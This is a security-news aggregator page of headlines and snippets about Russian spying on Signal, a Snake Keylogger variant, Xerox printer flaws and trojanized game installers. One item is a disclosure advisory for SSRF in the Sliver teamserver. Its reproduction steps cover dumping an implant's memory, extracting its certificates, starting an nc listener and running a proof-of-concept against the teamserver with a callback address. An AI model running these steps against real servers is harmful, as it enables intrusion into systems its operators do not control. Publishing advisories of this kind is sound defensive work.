Security
Headlines
HeadlinesLatestCVEs

Tag

#windows

Russian Groups Target Signal Messenger in Spy Campaign

These sorts of attacks reveal growing adversary interest in secure messaging apps used by high-value targets for communication, Google says.

DARKReading
Open in Source
#windows#google#microsoft#git#intel#auth#sap
GHSA-fh4v-v779-4g2w: SSRF in sliver teamserver

### Summary The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so ### Reproduction steps Run server ``` wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux chmod +x sliver-server_linux ./sliver-server_linux ``` Generate binary ``` generate --mtls 127.0.0.1:8443 ``` Run it on windows, then `Task manager -> find process -> Create memory dump file` Install RogueSliver and get the certs ``` git clone https://github.com/ACE-Responder/RogueSliver.git pip3 install -r requirements.txt --break-system-packages python3 ExtractCerts.py implant.dmp ``` Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc ``` nc -nvlp 1111 ``` Run the poc (pasted at bottom of this file) ``` python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT> python3 poc.py 192.168.1.33 8443 44.221.186.72 1111...

Hackers Tricking Users Into Linking Devices to Steal Signal Messages

Is your Signal, WhatsApp, or Telegram account safe? Google warns of increasing attacks by Russian state-backed groups. Learn…

Malwarebytes introduces native ARM support for Windows devices 

Malwarebytes now protects ARM-based Windows devices, such as Microsoft’s Surface Pro X and Lenovo’s Yoga laptops.

Google now allows digital fingerprinting of its users

Google is allowing its advertizing customers to fingerprint website visitors. Can you stop it?

Macs targeted by infostealers in new era of cyberthreats

Info stealers are thriving on Mac, with one specific variant accounting for 70% of all info stealer detections at the end of 2024.

New Snake Keylogger Variant Leverages AutoIt Scripting to Evade Detection

A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain. Fortinet FortiGuard Labs said the new version of the malware has been behind over 280 million blocked infection attempts worldwide since the start of the year. "Typically delivered through phishing emails containing malicious attachments or links,

Xerox Versalink Printers Vulnerabilities Could Let Hackers Steal Credentials

Xerox Versalink printers are vulnerable to pass-back attacks. Rapid7 discovers LDAP & SMB flaws (CVE-2024-12510 & CVE-2024-12511). Update…

Trojanized Game Installers Deploy Cryptocurrency Miner in Large-Scale StaryDobry Attack

Users who are on the lookout for popular games were lured into downloading trojanized installers that led to the deployment of a cryptocurrency miner on compromised Windows hosts. The large-scale activity has been codenamed StaryDobry by Russian cybersecurity company Kaspersky, which first detected it on December 31, 2024. It lasted for a month. Targets of the campaign include individuals and